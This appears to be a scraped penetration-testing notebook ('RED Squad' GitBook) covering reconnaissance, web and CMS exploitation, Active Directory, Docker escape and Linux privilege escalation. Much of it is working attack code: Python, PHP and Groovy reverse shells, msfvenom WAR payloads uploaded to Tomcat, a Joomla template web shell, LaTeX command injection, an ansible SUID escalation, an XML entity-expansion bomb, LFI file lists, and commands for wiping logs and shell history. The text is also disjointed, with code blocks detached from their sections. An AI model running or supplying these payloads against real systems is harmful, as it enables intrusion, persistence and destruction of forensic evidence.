1 of 100

RED Squad [en]

/home/red-squad

Introduction

`whoami`

Welcome to our GitBook, a meticulously curated repository crafted by two dedicated young penetration testers. Our mission is to compile a comprehensive inventory of the tools, techniques, and knowledge we've amassed in the realms of cybersecurity, penetration testing, and red teaming over the recent years.

Recently Added

Support our projects

Is There Life After Death ?

After compromising an infrastructure, web app, what is next ?

The MITRE ATT&CK resource is a good starting point. The end result of the attack will look a bit different based on the goal of the bad actor. The goal might be to :

Steal sensitive company/client/employee information, ransom, breaking/DoS applications,
Defacement for financial/reputation loss.

Regardless of the goal, I would start with discovery if I'm already inside the infrastructure/app.
This would allow me to check what other systems are within the infrastructure (and later try to exploit them).
For the app :
I would check what data it has/gathers.

Web Hacking

CTFs shortcuts

Find flag

Web Dev

Mozilla Firefox

CTRL + SHIFT + I

HTTP Headers Response

Stabilize Reverse shell

use CTRL + C

There's three popular ways I use to stabilize a reverse shell;

Python, as mentioned above.
riwrap, which prepends to a netcat shell for additional terminal features.
Socat, which is a step above netcat but must be manually transferred over and launched on the target machine.

Audits plan

Exposition Audit - Plan

The objective is to define the attack surface of a company, mainly made up of all the elements of its information system exposed on the Internet.

Reconnaissance

OSINT

🕵️ OSINT

Open-source intelligence (OSINT) is the collection and analysis of data gathered from open sources (covert sources and publicly available information [PAI]) to produce actionable intelligence. OSINT is primarily used in national security, law enforcement, and business intelligence functions and is of value to analysts who use non-sensitive intelligence in answering classified, unclassified, or proprietary intelligence requirements across the previous intelligence disciplines.

Website OSINT

Business OSINT

Methodology

https://techjournalism.medium.com/osint-checklist-for-company-investigations-86c3752c095d" %}

IP addresses

TOR network

Search in the TOR Network

Services

Vulnerabilities and IOC

Find Vulnerability Data and Indicators of Compromise

Services

— A search engine, database, and widely accepted classifier of vulnerabilities.
— The official US government vulnerability database.
— A vulnerability database incorporating CVEs and security advisories.
, , , — Additional sources of data on vulnerabilities and indicators of compromise.
— A CVE search engine with integrated alerts for new threats.
и , — Open-source vulnerability databases.
— A project compiling vulnerabilities and security issues of cloud service providers.
— A system for searching information about current threats.
— A database containing details of over 180 thousand vulnerabilities and 4 thousand exploits, with all exploits included in Metasploit.
— A CVE-compliant archive of publicly available exploits and vulnerable software.
— A search engine for exploits and hacking tools.

IOC

— Information gathering about IP address, top threats
— ThreatMiner is a threat intelligence portal designed to enable analysts to research under a single interface.

Enumeration

Enumeration is Key

Web Scanners

nikto

Usage

Subdomains

Enumeration

Google

site:*.wikipedia.org -www -store -jobs -uk

site:*.*.example.com
site:*.*.*.example.com

Online Tools

Takeover

Subjack

HTTP Stuff

403 Bypass

Install

git clone https://github.com/sting8k/BurpSuite_403Bypasser.git
# BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

Check also

HTTP Parameters

Find Parameters

Arjun

Sessions / Tokens

Cookies

Cookies are small bits of data that are stored in your browser. Each browser will store them separately, so cookies in Chrome won't be available in Firefox. They have a huge number of uses, but the most common are either session management or advertising (tracking cookies). Cookies are normally sent with every HTTP request made to a server.

You can check your cookies security attributes with ZAP or Nikto.

Brief

Define Cookies attributes

Restrict access to cookies

Secure
- Only sent to the server with an encrypted request over HTTPS, never sent with HTTP.
HTTPOnly

Define where cookies are sent

SameSite
- The SameSite attribute lets servers specify whether/when cookies are sent with cross-site requests (where Site is defined by the registrable domain). This provides some protection against cross-site request forgery attacks (CSRF).
- It takes three possible values: Strict, Lax, and

Cookies prefixes

Attacking JWT

Aim

JWT attacks involve a user sending modified JWTs to the server in order to achieve a malicious goal. Typically, this goal is to bypass authentication and access controls by impersonating another user who has already been authenticated.

The impact of JWT attacks is usually severe. If an attacker is able to create their own valid tokens with arbitrary values, they may be able to escalate their own privileges or impersonate other users, taking full control of their accounts.

Flawed Signature Verification

For example, consider a JWT containing the following claims:

Changing the parameter "isAdmin" to true : Privilege Escalation.

JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library jsonwebtoken has verify() and decode(). Occasionally, developers confuse these two methods and only pass incoming tokens to the decode() method. This effectively means that the application doesn't verify the signature at all.

Accepting Tokens with No Signature

Change the "alg" value to "none". Remove the signature part but leave the trailing dot ".".

Even if the token is unsigned, the payload part must still be terminated with a trailing dot.

Brute-forcing Secret Keys

Some signing algorithms, such as HS256 (HMAC + SHA-256), use an arbitrary, standalone string as the secret key. Just like a password, it's crucial that this secret can't be easily guessed or brute-forced by an attacker. Otherwise, they may be able to create JWTs with any header and payload values they like, then use the key to re-sign the token with a valid signature.

When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets. They may even copy and paste code snippets they find online, then forget to change a hardcoded secret that's provided as an example. In this case, it can be trivial for an attacker to brute-force a server's secret using a wordlist of well-known secrets.

JWT Wordlist : https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list$

If the server uses an extremely weak secret, it may even be possible to brute-force this character-by-character rather than using a wordlist.

How to

Then : Generate another key using JWT Editor Keys on BurpSuite, change the "k" parameter to the base64-encoded secret. Start accessing admin panels.

Tools

JWT Toolkit V2

Injections

Injections are a security vulnerability in websites and web applications where attackers inject malicious code/data by exploiting a flaw in the way the application handles user input.

There are several types of injections that attackers can use to exploit vulnerabilities in web applications. Some of the most common include:

SQL injection: This occurs when an attacker is able to insert SQL commands into an application's database queries, allowing them to manipulate or extract sensitive data from the database.

LaTex

What is LaTex ?

LaTeX is a document preparation system for high-quality typesetting. It is most often used for medium-to-large technical or scientific documents but it can be used for almost any form of publishing.

Injections

Read files

Write file

Command execution

Cross-Site Scripting

Resources

Web Vulnerabilities

CSRF

What is a CSRF attack ?

In a Cross-Site Request Forgery attack, a malicious site tricks a victim's browser into making an unwanted request to a different site on which the victim is authenticated, potentially causing the victim to perform an action on that site without their knowledge or consent.

ClickJacking

What is ClickJacking ?

Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page.

Thus, the attacker is “hijacking

Files / Upload

IDOR

What is IDOR ?

It is a type of an Access Control Vulnerability.

An Access Control Vulnerability is when an attacker can gain access to information or actions not intended for them.

Remote Code Execution

What is RCE ?

If an attacker gains control of a target computer through some sort of vulnerability, and they also gain the power to execute commands on that remote computer this process is called Remote Code Execution (RCE)

It is one of the cyber-attacks where an attacker can remotely execute commands on someone’s computer
It usually occurs due to malicious malware downloaded by the host and can happen regardless of the geographic location of the device.

How is it possible ?

With RCE, hackers can edit or destroy important files, steal confidential data, perform DDoS (Distributed Denial of Service) attacks, and compromise the entire system.

The attacks can be occurred due to:

External user input unchecked
Access control is poor
Authentication measures are not properly done

Servers / CMS

CMSMap

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla, Drupal and Moodle.

Tomcat

No Account

Default Credentials

Bruteforce

Passwords Backtrace disclosure

/auth.jsp

With Account

Manager - RCE

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script).
Those details can be find under tomcat-users.xml usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (it vary between versions)

PoC

Drupal

Manual

Exploits

Drupal < 8.7.x Authenticated RCE module upload

Drupal < 9.1.x Authenticated RCE Twig templates

"Administer views" -> new View of User Fields -> Add a "Custom text" :

If found /node/$NUMBER, the number could be devs or tests pages

Drupal < 8.6.9 - REST Module Remote Code Execution

Check for username disclosure on old versions:

?q=admin/views/ajax/autocomplete/user/a

Tools

Drupwn

Enumeration & Exploitation

droopescan

WordPress

Manual

Information Gathering

Wordpress eBook Download < 1.2 - CVE-2016-10924

Brief

There is a directory traversal vulnerability in Wordpress eBook Download < 1.2, which allow remote attackers to read arbitrary files.

SAP

Discovery

Default Passwords

USER

PASSWORD

CLIENT

Exploits

SAP_RECON (CVE-2020-6287, CVE-2020-6286)

This script allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in queryProtocol method.
Directory traversal allows to download any zip from SAP server.

Jenkins

Enumeration

msf> use auxiliary/scanner/http/jenkins_enum

# execute commands without authentication ?
msf> use auxiliary/scanner/http/jenkins_command

# get jenkins version
/oops
/error

RCE from Script Console

From :

Resources

Joomla!

Reconnaissance

Endpoints | Manual

Server-Side Vulnerabilities

API

MindMap

OWASP TOP 10 API

Linux Hacking

Privilege Escalation

Privilege Escalation is a malicious attempt to abuse an app or OS bug or error of

Ansible

If an ansible file is loaded by a root process : Privilege Escalation

PoC

# Create a .yml file just like the other one
nano evil.yml
# Content :
- hosts: localhost
  tasks:
    - name: RShell
      command: chmod u+s /bin/bash
      become: true

# ---
# save the file CTRL+O CTRL+X
# ---

ls -lah /bin/bash
ansible-playbook evil.yml
bash -p
# root

Cover tracks

Log files

MoonWalk 🕺

Reverse Shells

List

Reverse Shell Online Generators

Host locally :

`PHP Payloads`

`Bash TCP`

`Python`

`Netcat`

`PHP`

Shell Stabilizing

Python shell

On Attacker PC : -- Ctrl + Z -- Enter --

PwnCat

Installation

pip install pwncat-cs

Connect to victim

# Connect to a bind shell
pwncat-cs connect://10.10.10.10:4444
pwncat-cs 10.10.10.10:4444
pwncat-cs 10.10.10.10 4444

# Listen for reverse shell
pwncat-cs bind://0.0.0.0:4444
pwncat-cs 0.0.0.0:4444
pwncat-cs :4444
pwncat-cs -lp 4444

# Connect via ssh
pwncat-cs ssh://user:[email protected]
pwncat-cs [email protected]
pwncat-cs user:[email protected]
pwncat-cs -i id_rsa [email protected]

# SSH w/ non-standard port
pwncat-cs -p 2222 [email protected]
pwncat-cs [email protected]:2222

# Reconnect utilizing installed persistence
#   If reconnection fails and no protocol is specified,
#   SSH is used as a fallback.
pwncat-cs reconnect://[email protected]
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs [email protected]
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
pwncat-cs 10.10.10.10

Ping-Pong

TcpDump

Check connectivity between attacker and victim.

#Victim
ping 10.8.132.133

#Attacker
sudo tcpdump -i tun0 icmp

#Networks accessible via the VPN
#Checking Routing Table | Linux

netstat -rn
sudo netstat -rn

#Checking current connections
netstat -an
netstat -ano | findstr TCP | findstr ":0"

Buffer Overflow

Docker Escape

Know you're in a docker

ps aux
cd / && ls -lah
# if .dockerenv then ...

cat /proc/1/cgroup

Escape

arp -a
# other hosts ???
# scan open ports
nc -zv 127.0.0.1 1-65535
nc -zv $host 1-65535

# check for db and other stuff....

Resources

DeepCE

File sharing

lightweight Web Server

# python
python -m SimpleHTTPServer 8080
python3 -m http.server

# busybox
busybox httpd --help # show available options
busybox httpd -p 127.0.0.1:8080 -h /var/www/  # start start httpd 
pkill busybox  # to stop busybo httpd

# npm
http-server

# php
php -S 127.0.0.1:8080

Others

# curl
curl -O http://192.168.0.101/file.txt

# nc
# to share
nc -lvp 4444 < file
# to receive
nc 192.168.1.102 4444 > file

# scp
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext

Windows Hacking

Active Directory

Active Directory is a widely used directory service by Microsoft that stores information about users, computers, and other resources on a network.
As with any technology, Active Directory has its own set of vulnerabilities that can be exploited by attackers to gain unauthorized access to network resources.
Some common Active Directory vulnerabilities are:

Weak passwords

Kerberos

findDelegation

`Impacket-findDelegation`

Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment.

findDelegation.py "DOMAIN"/"USER":"PASSWORD"

# --user feature in 2021
findDelegation.py -user "account" "DOMAIN"/"USER":"PASSWORD"

More about delegations

Kerbrute

`kerbrute`

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

Attack

Port 88 : Kerberos authentication system

# for each ip bloc :
blocip=0.0.0.0
filename=$(echo $blocip | tr '/' '-')
nmap -sn -v $blocip -oA ./${filename}_up --min-rate 1000
grep Up ${filename}_up.gnmap | awk '{print $2}' > ip-up-${filename}.txt
nmap -p- --open -sV -Pn -sT -v -iL ip-up-${filename}.txt -oA ./${filename}-full-scan --min-rate 1000

wget https://raw.githubusercontent.com/ajnik/joomla-bruteforce/master/joomla-brute.py
python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
# Joomla! MySQL credentials plain-text
# Modify a template when logged in
# Site templates > Editor > modify 'error.php' :
system($_GET['cmd']);

# try : 
curl -s http://joomla-site.local/templates/cassiopeia/error.php\?cmd\=id

# metasploit
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

# msfvenom - manually
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=8083 -f war -o revshell.war
# upload it to tomcat and access it : /revshell/
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"

# host
nc -lvnp 8083

curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
# or
cargo install --git https://github.com/mufeedvh/moonwalk.git
# from source
git clone https://github.com/mufeedvh/moonwalk.git
cd moonwalk/
cargo build --release

# wfuzz
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://$target.com" -H "Host: FUZZ.$target.com"

# ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.target.com" -u $target.com

# amass
amass enum -d $domain

# sublistr |
sublist3r -d $domain -v

# dnsrecon
dnsrecon -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -v -d $domain

# dnsenum
dnsenum $target.com

revsh.groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh

# start
chmod +x ./deepce.sh
./deepce.sh

# create new root user on system
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

External Audit - Plan

'''
Black Box
'''
# Network
nmap -A -p- -Pn -f $target -oN scan
nmap -sC -sV -p- $target -oN scan
# or
rustscan -a $target -- -sC -sV -oN scan

# identify technologies / CMS -> check for vulnerabilities

# whois
whois $target

# Google Dorking (infos leak)
site:$target filetype:txt
site:$target filetype:pdf
site:$target intext:admin
site:$target inurl:admin

# Accounts Leaks : intelx.io 

# Reconnaissance
gospider -q -c 10 -s "http://$target"
# wappalyzer / identify versions
# read source code of webpages / finds keys / hidden endpoints

# WEB APP
nikto -h $target

# Fuzzing
feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster
# or
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -u https://0.0.0.0/FUZZ --hw $hw -p $proxy

# TLS / HSTS
./testssl.sh $target
# burp suite > server response > hsts ? 
# info leak in headers ?

# HTTP parameters
arjun -u $url

'''
Grey Box
'''
# COOKIES
## Secure, HTTPOnly flags
## session fixation

# Inputs : SQLi / XSS / CSRF / SSRF / SSTI / OS Injection

# FUNCTIONALITIES 
#       logout / session timeout ? if the session is properly killed after logout.
#	password change, weak pass ?
#       IDOR  / Improper Isolation or Compartmentalization :
#	    access URI functionalities with no auth / no privileges
#       Uploads : eicar / file uploads bypass / lfi ?
#       zipslip / CSV injection

# Enumerate all plugins with known vulnerabilities
wpscan --url $target -e vp --plugins-detection mixed --api-token $YOUR_TOKEN

# Enumerate all plugins in WPSCAN database (could take a very long time)
wpscan --url $target -e ap --plugins-detection mixed --api-token $YOUR_TOKEN

# install
git clone https://github.com/urbanadventurer/WhatWeb.git
cd WhatWeb
make install

# usage
# Default scan
whatweb $ip

# Scan the local network quickly and suppress errors
whatweb --no-errors $network

whatweb --aggression=Stealthy/Aggressive/Heavy --verbose 

# Scan reddit.com slashdot.org with verbose plugin descriptions
whatweb -v reddit.com slashdot.org

# An aggressive scan of wired.com detects the exact version of WordPress.
whatweb -a 3 www.wired.com

# Scan the local network for https websites
whatweb --no-errors --url-prefix https:// $network

/etc/syslog.conf

# in this file, you can read all the logs that Syslog logs.
# on linux/unix, a lot of systems logs are stored : 
/var/logs
# i.e. 
/var/log/messages
/var/log/auth.log # ssh, sudo attempts

# APACHE
/var/log/apache2/access.log
/var/log/apache2/error.log

# remove your ip :
grep -v '$src-ip-address' /path/to/access_log > a && mv a /path/to/access_log
grep -v <entry-to-remove> <logfile> > /tmp/a ; mv /tmp/a <logfile> ; rm -f /tmp/a

# utmp / wtmp
who
last
lastlog

# COMMAND HISTORY
echo $HISTFILE
# You can set your file size like this to zero, to avoid storing commands.
export HISTSIZE=0

# SHRED FILES
# lets you remove files in a more secure way
shred -zu $filename

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

# if errors : encode base64

# MISC of commands
# list of users in users file
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $ip $domain/${user} | grep -v Impacket; done

GetNPUsers.py -dc-ip $ip -request $domain/

GetNPUsers.py -dc-ip $ip -request $domain/ -format hashcat/john

GetNPUsers.py -dc-ip $ip -usersfile users.txt $domain/

GetNPUsers.py $domain/backup -no-pass

GetNPUsers.py -no-pass $domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt

Server-Side Request Forgery

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials.

Exploitation

Against the server itself

Here, the server will fetch the contents of the /admin URL and return it to the user.

Against other back-end systems

Another type of trust relationship that often arises with server-side request forgery is where the application server is able to interact with other back-end systems that are not directly reachable by users.

In the preceding example, suppose there is an administrative interface at the back-end URL https://192.168.0.68/admin. Here, an attacker can exploit the SSRF vulnerability to access the administrative interface by submitting the following request:

Bypass Defenses

Blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.
Obfuscating blocked strings using URL encoding or case variation.

Whitelist-based input filters

Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent the filter by exploiting inconsistencies in URL parsing.

The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:

You can embed credentials in a URL before the hostname, using the @ character. For example:
- https://expected-host@evil-host
You can use the # character to indicate a URL fragment. For example:

php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf

-Pn # disables the ping command and only scans ports
-f # used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS.
# ALTERNATIVES TO -f, but providing more control over the size of the packets: 
--mtu <number> # accepts a maximum transmission unit size to use for the packets sent. This must be a multiple of 8.
--scan-delay <time> # in ms, used to add a delay between packets sent. This is very useful if the network is unstable, but also for evading any time-based firewall/IDS triggers which may be in place.
--badsum # this is used to generate in invalid checksum for packets. Any real TCP/IP stack would drop this packet, however, firewalls may potentially respond automatically, without bothering to check the checksum of the packet. As such, this switch can be used to determine the presence of a firewall/IDS.

# Scan from spoofed IP
nmap 192.168.1.1 -D 192.168.1.2

# Scan Facebook from Microsoft
nmap -S www.microsoft.com www.facebook.com

# Use a specific source port
nmap 192.168.1.1 -g 53

# http site map generator
nmap -Pn --script=http-sitemap-generator scanme.nmap.org 

# Fast search for random web servers
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 

# Brute forces DNS hostnames guessing subdomains
nmap -Pn --script=dns-brute domain.com

# Safe SMB scripts to run
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 

# Whois query
nmap --script whois* domain.com 

# Detect cross site scripting vulnerabilities.
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org 

# Check for SQL injections
nmap -p80 --script http-sql-injection scanme.nmap.org

# Use in most cases : Noisy AF
rustscan -a 0.0.0.0 -- -A -sC -sV -oN initial.log

# SYN "Stealth" scan
sudo rustscan -a 0.0.0.0 -- -vv -oN Initial-SYN-Scan

# Service Scan
sudo rustscan -a 0.0.0.0 -p 22,53,80,443 -- -sV -Pn -vv

# Multiple IP Scanning
rustscan -a 0.0.0.0,1.1.1.1

# CIDR support
rustscan -a 192.168.0.0/30

# Selected port scanning
rustscan -a 0.0.0.0 -p 53,80,121,65535

# Ranges of ports
rustscan -a 0.0.0.0 --range 1-1000

# UDP scan
rustscan -a 0.0.0.0 -sU -p ports

# admin interfaces
/apex/apex_admin
/i/apex_admin
/pls/apex/apex_admin
/ords/<workspace_name>/builder
# dev URL
/apex/wwv_flow.show?P_FLOW_ID=APP_ID
# web service
/apex/APP_ALIAS/wwv_flow.ajax
/apex/APP_ALIAS/wwv_flow.file_upload
/apex/APP_ALIAS/wwv_flow.accept
# misc
/apex/f?p=13000:1 # Packaged applications
/apex/f?p=4700 # Application Builder
/apex/f?p=4000:4500 # Team Development
/apex/f?p=4350 # SQL Workshop
/apex/f?p=4950 # Administration Services

<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

dir # uses directory/file enumeration mode
dns # uses dns subdomain enumeration mode
fuzz # uses fuzzing mode
help # help about any command
s3 # uses aws bucket enumeration mode
version # shows the current version
vhost # uses vhost enumeration mode

--delay <duration> # Time each thread waits between requests (e.g. 1500ms)
-h # help for gobuster
--no-error # Don't display errors
-z # Don't display progress
-o <string> # Output file to write results
-p <string> # File containing replacement patterns
-q # Don't print the banner and other noise
-t <int> # Number of concurrent threads (default 10)
-v # Verbose output (errors)
-w <string> # Path to the wordlist

# discover txt,html,js,json,php,py files
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py

# exclude 403,404 codes
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403 404

# discover 0.0.0.0 subdomains 
gobuster dns -d http://0.0.0.0 -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# discover txt,html,js,json,php,py files using a proxy connection
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py --proxy http://127.0.0.1:8081

#seclist
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

#dirbuster
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o feroxbuster

feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

# search for directories & put 404 responses away
wfuzz -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --hc 404 http://0.0.0.0/FUZZ

# search for php files
wfuzz -w wordlist/general/common.txt http://0.0.0.0/FUZZ.php

# use 2 wordlists for user & pass & put 302 responses away
